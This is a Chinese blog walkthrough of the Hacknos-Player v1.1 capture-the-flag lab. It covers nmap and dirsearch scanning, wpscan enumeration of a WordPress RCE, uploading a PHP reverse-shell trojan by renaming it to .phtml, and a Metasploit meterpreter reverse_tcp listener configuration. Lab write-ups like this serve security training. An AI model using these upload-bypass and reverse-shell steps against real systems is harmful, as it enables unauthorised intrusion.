Hacknos-Player V1.1打靶渗透

最新推荐文章于 2024-08-29 20:58:07 发布
最新推荐文章于 2024-08-29 20:58:07 发布
阅读量276 收藏 3
点赞数 6
文章标签: linux 网络 web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140421269
版权

一、信息收集

步骤一:主机发现

nmap 192.168.7.0/24

步骤二:端口扫描

nmap -p- 192.168.7.180

步骤三:访问80端口:

步骤四、目录扫描:

没有有用的信息。

步骤五、返回首页,翻译一下看到一个新的路径:

首页没有看到有用的功能点。

步骤六、扫描一下这个目录:

dirsearch -u http://192.168.7.180/g@web

步骤七、拼接访问只找到一个登录框:

步骤八、属于wordpress框架使用wpscan枚举用户名:

步骤九、访问wpscan查出来的网页:

找到一个密码,尝试登录没有结果。

步骤十、使用wpscan进行漏洞扫描:

发现有一个RCE漏洞。

步骤十一、访问这个网站,修改poc保存为一个html文件:

二、GetShell

步骤十二、使用kali生成一个反弹shell的木马文件:

步骤十三、上传木马文件,发现提示后缀名不对:

步骤十四、修改后缀名为.phtml,再次上传:

显示上传成功

步骤十五、打开msf反弹shell:

####开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.135
set LPORT 6666
exploit

步骤十六、访问上传的文件:

步骤十七、点击文件进行反弹:

搬砖小星
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ZL-Player v1.1
02-23
一个很不错的多媒体播放器!支持现在比较流行的视频(AVI、MPEG、WMV等)、音频(WAV、MP3等)格式。此为免费的共享软件.
Wav Player v1.1.2.8.zip
07-08
"Wav Player v1.1.2.8.zip" 是一个软件压缩包,其中包含了Wav Player的特定版本,即1.1.2.8版。这个软件主要用于播放WAV格式的音频文件,是一种专为.wav音频文件设计的播放工具。 【描述分析】 描述中提到的"Wav ...
Hacknos-Player V1.1打靶渗透【附POC】
weixin_52487093的博客
07-12 1177
Hacknos-Player V1.1打靶渗透【附POC】 WPScan-免费密钥API申请
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 509
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
Hacknos-Player V1.1靶机渗透测试
weixin_58786230的博客
07-12 235
【代码】Hacknos-Player V1.1靶机渗透测试。
Hacknos-Player V1.1靶机
m0_61995767的博客
07-15 522
Hacknos-Player V1.1打靶记录
Vulnhub靶机:HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1268
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
VulnHub:Hacknos-Player V1.1靶机
wbplife的博客
07-12 367
root用户目录下的root.txt。
Vulnhub之player-v1.1渗透测试
Bird&Bird
03-31 325
目录1、靶机概述2、信息收集3、获取shell4、提权获取高权限用户获取root权限 1、靶机概述 Difficulty: Intermediate Learning: Web Application | Enumerate | Good Enumeration | Privilege Escalation Overview: Tested: VirtualBox/VMWare Virtual Machine: - Format: Virtual Machine Virtualbox OVA Network
靶机Hacknos-2.1
weixin_50815573的博客
02-21 1327
靶机地址 https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/# 目标为 普通用户的user.txt和root用户的root.txt 第一步现将我们下载好的靶机导入到VirtualBox中启动靶机 第二步,打开我们的kali 使用 nmap -sP 192.168.1.0/24 搜索内网或者的主机 找到我们的目标靶机ip, 这里有个技巧,通过VirtualBox >>设置 >>网络 >> 高.
No.49-VulnHub-hackNos: Os-hackNos-2.1-Walkthrough渗透学习
qq_34801745的博客
02-09 754
** VulnHub-hackNos: Os-hackNos-2.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年11月29日 靶机描述: Difficulty : Easy to Intermediate Flag : 2 Flag fi...
ZY-Player-TV:ZY Player TV 应用,使用 Flutter 开发
05-30
ZY-Player-TV ZY Player TV app, developed with Flutter 1. 设置Flutter环境 1.1 按着 页面的指导,先安装好Flutter和Android Studio 1.2 打开Android Studio, 依次打开Tools->AVD Manager, 生成一个新的虚拟机. ...
tb-video-player:淘宝视频播放器KISSY组件
06-15
tb-video-player 版本:1.5 教程: demo: changelog V1.5 修复一个页面上有多个播放器同时存在引起的bug; V1.4 增加两个方法:play和pause,支持js处理...V1.1 增加视频封面配置项; 修复部分bug。 V1.0 首次发布
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
最新发布
AsherGu的博客
08-29 1216
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
Linux 常用命令 - lsblk 【查看磁盘(块设备)使用情况】
随便转转
08-27 1293
lsblk源自于 “list block devices” 的缩写。这个命令用于列出系统中的所有块设备(block devices),比如硬盘、光驱等。它展示块设备的层次结构、大小和挂载点等信息,非常有助于系统管理员理解系统存储结构。
LinuxLinux Bash Shell 教程
Young_Pro的博客
08-27 1599
Linux bash(Bourne-Again SHell)是一种为GNU操作系统编写的命令行解释器,它是大多数Linux发行版中最常用的shell。Bash提供了一种强大的方式来控制和管理操作系统,支持命令历史记录、别名、管道、重定向、变量、条件判断、循环以及自定义脚本编写等功能,使得用户能够通过简单的命令行指令执行复杂的任务,是系统管理员和开发人员日常工作中的得力工具。
linux 中如何将.c 文件转换为可执行文件
千千道的博客
08-29 1723
Linux 环境下进行 C 语言编程时,将.c文件转换为可执行文件是一个关键的步骤。这个过程涉及到使用编译器和一些相关的工具,本文将详细介绍在 Linux 系统中如何将.c文件转换为可执行文件的方法。
易语言aplayerv1.1
10-07
易语言APLayerv1.1是一个用于音频播放的类库。它可以方便地实现在易语言中播放各种音频文件的功能。 在APLayerv1.1中,提供了丰富的接口和方法,使用户可以轻松控制音频的播放、暂停、停止和调节音量等操作。用户只需简单调用相应的方法,即可实现这些功能。 此外,APLayerv1.1还支持音频文件的读取和写入操作,用户可以通过调用相关方法,读取音频文件的信息,或将音频数据写入到文件中。 APLayerv1.1还提供了一些特殊效果的功能,如平滑渐变音量、指定播放位置等。用户可以根据需求选择相应的特效方法,以达到更加个性化的音频播放效果。 值得一提的是,APLayerv1.1还支持多线程播放技术,用户可以在程序中同时播放多个音频文件,并对它们进行独立的控制。这样可以实现更复杂的音频播放需求,比如同时播放背景音乐和音效等。 总之,易语言APLayerv1.1提供了丰富的接口和方法,方便易语言用户进行音频播放的操作。无论是简单的播放功能,还是更复杂的音频处理需求,都可以通过这个类库来实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值